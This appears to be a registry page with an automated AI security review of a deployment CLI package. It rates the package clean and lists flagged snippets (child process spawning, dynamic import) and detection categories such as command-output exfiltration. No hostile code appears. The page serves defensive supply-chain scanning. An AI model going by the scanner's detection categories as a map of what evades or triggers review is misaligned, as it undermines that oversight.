registry  /  @intentic/cli  /  1.78.0

@intentic/cli@1.78.0

AI Security Review

scanned 22h ago · by lpm-firewall-ai

No confirmed malicious attack surface. Sensitive filesystem, subprocess, SSH, Docker, and network behavior is tied to explicit deployment/demo CLI commands for an infrastructure tool.

Static reason
One or more suspicious static signals were detected.
Trigger
User invokes intentic commands such as init, resolve, apply, or demo modes
Impact
Creates local scaffold files and may provision/update infrastructure described by user intent
Mechanism
user-directed deployment orchestration CLI
Rationale
Static inspection shows an intent-driven deployment CLI with no lifecycle hooks, no unconsented AI-agent control-surface writes, and no credential harvesting or exfiltration beyond user-directed provider/API use. Scanner hits are package-aligned runtime capabilities for scaffolding, resolving, applying, and demo orchestration.
Evidence
package.jsondist/cli.jsdist/app.jsdist/init/init.jsdist/init/scaffold-app.jsdist/resolve/resolve.jsdist/apply/apply.command.jsdist/demo.jsREADME.mdintent/deploy.config.tsintent/package.jsonintent/tsconfig.jsonintent/.gitignoredesired-state/.gitignoredesired-state/desired-state.jsondesired-state/status.jsondesired-state/access.mddesired-state/.env.exampledesired-state/.secrets.jsonapp/package.jsonapp/server.jsapp/Dockerfileapp/.gitignore.demo/state.json
Network endpoints6
api.cloudflare.com/client/v4/accounts/{accountId}/cfd_tunnel/{tunnelId}/connectionsgit.{zone}deploy.{zone}app.{zone}127.0.0.1:{forgejoPort}127.0.0.1:{komodoPort}

Decision evidence

public snapshot
AI called this Clean at 92.0% confidence as Benign with low false-positive risk.
Evidence for block
    Evidence against
    • package.json has no npm lifecycle hooks; only bin intentic -> dist/cli.js
    • dist/cli.js only invokes stricli app routing; no import-time install mutation
    • dist/init/init.js scaffolds intent/desired-state/app dirs and runs git/pnpm only when user invokes init
    • dist/resolve/resolve.js dynamically imports user config and reads Cloudflare token for package-aligned zone discovery
    • dist/apply/apply.command.js reconciles user artifact, writes status/access files, and posts optional user-provided Discord webhook
    • dist/demo.js Docker/SSH/Cloudflare actions are demo-mode runtime behavior, not install-time execution
    Behavioral surface
    Source
    ChildProcessCryptoDynamicRequireEnvironmentVarsFilesystemNetworkShell
    Supply chain
    HighEntropyStringsUrlStrings
    ManifestNo manifest risk signals triggered.
    scanned 37 file(s), 89.3 KB of source, external domains: 127.0.0.1, api.cloudflare.com

    Source & flagged code

    4 flagged · loading source
    dist/init/scaffold-app.jsView file
    1import { execFile } from "node:child_process"; L2: import { mkdir, writeFile } from "node:fs/promises";
    High
    Child Process

    Package source references child process execution.

    dist/init/scaffold-app.jsView on unpkg · L1
    dist/resolve/resolve.jsView file
    6export const loadIntent = async (configPath) => { L7: const loaded = (await import(pathToFileURL(resolve(configPath)).href)); L8: if (loaded.intent === undefined) {
    Medium
    Dynamic Require

    Package source references dynamic require/import behavior.

    dist/resolve/resolve.jsView on unpkg · L6
    dist/demo.jsView file
    29const komodoPort = config.demo.komodoPort; L30: const GIT_URL = `https://git.${zone}`; L31: const KOMODO_URL = `https://deploy.${zone}`; ... L38: const cliEnv = { L39: ...process.env, L40: DEMO_DOH_ZONE: zone, ... L43: const run = (command, args, env = process.env) => new Promise((resolve, reject) => { L44: const child = spawn(command, args, { cwd: repoRoot, env, stdio: ["ignore", "inherit", "inherit"] }); L45: child.on("error", reject);
    High
    Same File Env Network Execution

    A single source file combines environment access, network access, and code or shell execution; review context before blocking.

    dist/demo.jsView on unpkg · L29
    29const komodoPort = config.demo.komodoPort; L30: const GIT_URL = `https://git.${zone}`; L31: const KOMODO_URL = `https://deploy.${zone}`; ... L33: const log = (message) => { L34: process.stdout.write(`${message}\n`); L35: }; ... L43: const run = (command, args, env = process.env) => new Promise((resolve, reject) => { L44: const child = spawn(command, args, { cwd: repoRoot, env, stdio: ["ignore", "inherit", "inherit"] }); L45: child.on("error", reject);
    High
    Command Output Exfiltration

    Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.

    dist/demo.jsView on unpkg · L29

    Findings

    4 High3 Medium4 Low
    HighChild Processdist/init/scaffold-app.js
    HighShell
    HighSame File Env Network Executiondist/demo.js
    HighCommand Output Exfiltrationdist/demo.js
    MediumDynamic Requiredist/resolve/resolve.js
    MediumNetwork
    MediumEnvironment Vars
    LowScripts Present
    LowFilesystem
    LowHigh Entropy Strings
    LowUrl Strings